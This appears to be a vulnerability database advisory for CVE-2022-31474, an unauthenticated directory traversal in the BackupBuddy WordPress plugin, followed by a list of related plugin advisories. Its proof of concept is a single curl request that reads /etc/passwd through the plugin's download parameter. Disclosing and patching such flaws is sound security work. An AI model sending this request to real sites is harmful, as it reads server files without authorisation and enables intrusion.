BackupBuddy < 8.7.5 – Unauthenticated Arbitrary File Access | CVE 2022-31474 | Plugin Vulnerabilities

Description

The plugin is affected by a Directory Traversal attack, allowing unauthenticated attackers to access arbitrary files on the web server, starting in version 8.5.8.0.

Proof of Concept

Install BackupBuddy v8.5.8.0 through v8.7.4.1.

curl 'https://example.com/wp-admin/admin-post.php?local-download=../../../etc/passwd&local-destination-id=0' (assuming your local path is set to something like /var/www/html/).

Affects Plugins

Fixed in 8.7.5

References

CVE

URL

https://ithemes.com/blog/wordpress-vulnerability-report-special-edition-september-6-2022-backupbuddy/

Classification

Type

TRAVERSAL

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Lew Ayotte & Timothy Jacobs

Submitter

iThemes

Submitter website

https://ithemes.com/

Submitter twitter

Verified

Yes

WPVDB ID

435c9614-638d-439d-8ca2-2653d8628185

Timeline

Publicly Published

2022-09-06 (about 3 years ago)

Added

2022-09-07 (about 3 years ago)

Last Updated

2022-09-07 (about 3 years ago)

Other

Published

Title

Published

2023-12-08

Title

Import and export users and customers < 1.24.3 - Admin+ Arbitrary File Read/Deletion

Published

2023-01-23

Title

Customer Reviews for WooCommerce < 5.16.0 - Contributor+ LFI

Published

2026-03-05

Title

Shared Files < 1.7.58 - Contributor+ Arbitrary File Download

Published

2022-10-28

Title

Ultimate Member < 2.5.1 - Contributor+ LFI via Traversal

Published

2021-02-08

Title

Digital Publications by Supsystic < 1.6.12 - Authenticated Path Traversal